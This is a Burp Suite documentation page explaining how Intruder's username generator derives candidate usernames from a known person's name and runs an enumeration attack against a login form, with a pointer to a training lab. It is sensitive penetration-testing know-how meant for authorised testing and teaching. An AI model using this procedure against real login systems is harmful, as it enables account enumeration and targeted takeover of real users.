Guessing usernames for known users
Last updated: September 14, 2023
Read time: 2 Minutes
Burp Intruder has a built-in username generator that takes an input and produces a list of potential usernames using common patterns. For example, if you were to provide the input
Carlos Montoya the generator would return
mcarlos, and similar combinations.
This is useful in circumstances where you know details of a specific user (for example, their name or email address) but don't know their exact username. It provides a more targeted way of enumerating usernames than a generic name list.
You can test this process out in the Username enumeration via different responses Web Security Academy lab.
- In Burp's HTTP history, identify a failure message for a username-based authentication mechanism.
- In the message, highlight the username value, right-click, and select Send to Intruder.
- Go to Intruder > Positions. Notice that Burp has automatically added the username as a payload position.
- Select Sniper from the Attack type drop-down menu.
- Go to the Payloads tab.
- Select Username generator from the Payload type drop-down.
- Enter an input that you want to base the generated usernames on into the Enter a new item field of the Payload settings section and click Add. You can add multiple inputs per attack if required.
- Enter the number of usernames you want Burp to generate into the Maximum payloads per item field. Burp generates this number of usernames for every input added.
- Click Start attack. Intruder generates its list of potential usernames and runs an attack testing each username in turn.
- Analyze the attack results to check for interesting patterns, such as usernames that results in anomalous error messages, response times, or a different HTTP response code.
Was this article helpful?
An error occurred, please try again.